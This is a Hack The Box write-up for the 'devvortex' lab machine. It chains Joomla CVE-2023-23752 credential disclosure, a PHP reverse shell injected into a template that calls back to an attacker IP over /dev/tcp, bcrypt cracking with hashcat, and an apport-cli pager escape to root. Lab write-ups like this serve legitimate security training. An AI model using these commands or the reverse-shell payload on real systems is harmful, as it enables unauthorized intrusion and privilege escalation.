HTB: devvortex Writeup

Machine Information

Attribute	Details
Name	devvortex
OS	Linux
Difficulty	Easy
Points	20
Release Date	N/A
IP Address	`devvortex.htb`
Author	D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐⭐☆
Real-world: ⭐⭐⭐⭐☆
CVE: ⭐⭐⭐☆☆
CTF-like: ⭐⭐⭐☆☆

devvortex is an Easy-difficulty Linux machine that requires thorough web enumeration and exploitation of a Joomla vulnerability chain. The attack path leverages CVE-2023-23752 (Joomla information disclosure) to extract admin credentials, gains code execution through template injection, and escalates privileges via a pager escape vulnerability in apport-cli.

TL;DR: Subdomain enumeration → Joomla discovery → CVE-2023-23752 exploitation → Admin credentials → PHP reverse shell via template → MySQL credential extraction → User SSH access → apport-cli pager escape → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- devvortex.htb

Results:

The target runs a web server on port 80 (HTTP). Further enumeration of the primary domain and subdomains is necessary.

Service Enumeration

Primary Hostname: devvortex.htb

Add to /etc/hosts:

echo "10.10.11.17 devvortex.htb" >> /etc/hosts

Directory and Subdomain Enumeration

Perform initial directory brute-forcing on the main domain:

gobuster dir -u http://devvortex.htb -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://devvortex.htb -w /usr/share/wordlists/dirb/common.txt -r

Then enumerate subdomains:

ffuf -u http://FUZZ.devvortex.htb -w /usr/share/wordlists/subdomains-top1million-5000.txt -fc 404

Findings:

Discovered dev.devvortex.htb subdomain
Add to /etc/hosts: echo "10.10.11.17 dev.devvortex.htb" >> /etc/hosts

Further enumeration of the subdomain reveals key directories:

feroxbuster -u http://dev.devvortex.htb -w /usr/share/wordlists/dirb/common.txt -r

Key Discoveries:

/administrator/ — Joomla admin panel
/api/ — API endpoint

Application Identification

Use joomscan to identify the Joomla version:

joomscan -u http://dev.devvortex.htb

Results:

Joomla Version: 4.2.6
Status: Vulnerable to CVE-2023-23752 (Information Disclosure)

Vulnerability Assessment

Identified Vulnerabilities:

CVE-2023-23752 — Joomla information disclosure allowing extraction of sensitive configuration data (credentials, database names)
Joomla 4.2.6 — This version is explicitly vulnerable to the above CVE

Initial Foothold

Exploitation: CVE-2023-23752

The vulnerability allows unauthenticated access to sensitive API endpoints, specifically /api/index.php/v1/users and /api/index.php/v1/config, which leak credentials and system information.

Step 1: Extract Admin Credentials

Access the vulnerable API endpoint:

curl -s "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .

Response (partial):

{
  "dbtype": "mysqli",
  "host": "localhost",
  "user": "lewis",
  "password": "P4ntherg0t1n5r3c0n##",
  "db": "joomla",
  ...
}

Credentials obtained:

Username: lewis
Password: P4ntherg0t1n5r3c0n##
Database: joomla

Step 2: Access Admin Panel

Navigate to the Joomla admin panel:

http://dev.devvortex.htb/administrator/

Step 3: Inject PHP Reverse Shell via Template

Within the Joomla admin panel:

Navigate to System → Templates → Manage Templates
Select the atum template (or another active template)
Open the index.php file for editing

Inject the PHP reverse shell payload at the beginning of the file:

<?php
system('bash -c "bash -i >& /dev/tcp/10.10.14.25/1337 0>&1"');
?>

Save the template.

Step 4: Trigger Code Execution

Open a netcat listener on your attack machine:

nc -lvnp 1337

Visit the template URL to trigger the PHP execution:

curl http://dev.devvortex.htb/
# Or navigate to the admin panel URL

Result: Shell as www-data user.

User Compromise

Credential Discovery via Database Access

After obtaining the www-data shell, enumerate the system to find the MySQL credentials from the Joomla configuration.

Step 1: Stabilize the Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Step 2: Connect to MySQL

Using the credentials extracted earlier (lewis / P4ntherg0t1n5r3c0n##):

mysql -h localhost -u lewis -p joomla

When prompted for password, enter: P4ntherg0t1n5r3c0n##

Step 3: Enumerate Users

Within the MySQL shell:

SHOW TABLES;
SELECT * FROM sd4fg_users;

Output:

| id | name | username | email | password | ...
| 649 | Logan | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |

Extract the bcrypt hash for the logan user.

Step 4: Crack the Password Hash

Save the hash to a file:

echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > logan_hash.txt

Use hashcat to crack the bcrypt hash:

hashcat -m 3200 -a 0 logan_hash.txt /usr/share/wordlists/rockyou.txt

Result:

Username: logan
Password: tequieromucho

Step 5: SSH Access

Obtain SSH access as the logan user:

ssh logan@devvortex.htb
# Enter password: tequieromucho

User Flag

cat ~/user.txt

🚩 User Flag: [REDACTED]

Privilege Escalation

Enumeration

After gaining access as logan, perform privilege escalation enumeration:

sudo -l

Output:

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

The user can run apport-cli with full sudo privileges without a password.

Vulnerability Research

Check the version of apport-cli:

apport-cli --version
# or
dpkg -l | grep apport

Version: apport 2.20.11 — Vulnerable to pager escape (CVE-2023-26604 and similar)

The apport-cli tool uses a pager (typically less) to display reports. When invoked with V (view in pager), an attacker can escape the pager and execute arbitrary commands with escalated privileges.

Step 1: Generate a Crash Report

Trigger a segmentation fault and let the system capture the crash:

sleep 60 &
SLEEP_PID=$!
sleep 2
kill -SIGSEGV $SLEEP_PID

Alternatively, use any crashing application:

bash -c 'kill -SIGSEGV $$'

Step 2: Open Crash Report with apport-cli

Find the crash report file (typically in /var/crash/):

sudo apport-cli -c /var/crash/sleep.XXXX.crash
# or
sudo apport-cli -f

Step 3: Escape the Pager

When the crash report is displayed:

Press V to open the report in a pager (typically less)
Within the pager, type: !/bin/bash
Press Enter to execute the bash command

Result: Interactive bash shell as root.

Alternatively, you can invoke apport-cli in file mode:

sudo apport-cli -f

When prompted to select a crash report or file:

Select an option
Press V to view in pager
Type !/bin/bash and press Enter

Result: Interactive bash shell as root.

Root Flag

cat /root/root.txt

🚩 Root Flag: [REDACTED]

Attack Chain Summary

graph TD
    A["Subdomain Enumeration<br/>ffuf"] -->|Discovers dev.devvortex.htb| B["Joomla 4.2.6 Identified<br/>joomscan"]
    B -->|Vulnerable to CVE-2023-23752| C["API Info Disclosure<br/>Extract Credentials"]
    C -->|lewis:P4ntherg0t1n5r3c0n##| D["Admin Panel Access<br/>/administrator/"]
    D -->|Template Injection| E["PHP Reverse Shell<br/>www-data Shell"]
    E -->|MySQL Access| F["Extract logan Hash<br/>Bcrypt"]
    F -->|Crack with hashcat| G["logan Password<br/>tequieromucho"]
    G -->|SSH Access| H["User: logan"]
    H -->|sudo apport-cli| I["Pager Escape<br/>!/bin/bash"]
    I -->|Root Access| J["Privilege Escalation Complete"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service fingerprinting
`gobuster`	Directory enumeration on primary domain
`feroxbuster`	Recursive directory brute-forcing on subdomains
`ffuf`	Web fuzzing and subdomain enumeration
`joomscan`	Joomla CMS vulnerability scanner and version detection
`curl`	HTTP requests to exploit CVE-2023-23752 API
`jq`	JSON parsing of API responses
`mysql`	Database client for credential extraction
`hashcat`	Bcrypt password hash cracking (mode 3200)
`ssh`	Secure shell access as logan user
`nc` / `netcat`	Reverse shell listener
`python3`	Shell stabilization and scripting

Vulnerability Reference

#	Vulnerability	Component	Severity	Impact
1	CVE-2023-23752	Joomla 4.2.6	High	Unauthenticated information disclosure; leaks database credentials and configuration
2	PHP Code Injection	Joomla Templates	High	Arbitrary code execution; allows reverse shell injection
3	Weak Password Hashing	Joomla Database	Medium	Bcrypt hashes crackable via offline attacks (rockyou.txt)
4	CVE-2023-26604	apport-cli 2.20.11	High	Pager escape allowing privilege escalation from sudo access

Key Learnings

Web Enumeration is Critical: Subdomain discovery (dev.devvortex.htb) revealed the vulnerable instance. Always enumerate all subdomains and virtual hosts.
API Vulnerabilities: Joomla’s /api/ endpoint was unprotected and leaked sensitive configuration including database credentials. APIs deserve the same security scrutiny as traditional web interfaces.
Credential Reuse: Database credentials matched Joomla’s admin account, enabling lateral movement. Monitor credential exposure across systems.
Template Injection: CMS template systems can be weaponized for code execution. If admin access is achieved, always consider template/theme injection vectors.
Database Access: With database access, extract and crack user password hashes for additional accounts (logan).
Privilege Escalation via Pager: Legacy tools like apport-cli have well-known pager escape vulnerabilities. Always test sudo-accessible utilities for pager/editor escape vectors.
Bcrypt Cracking: While bcrypt is stronger than MD5, dictionary attacks with tools like hashcat remain viable, especially with large wordlists like rockyou.txt.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-23752 #Joomla #apport-cli #PrivEsc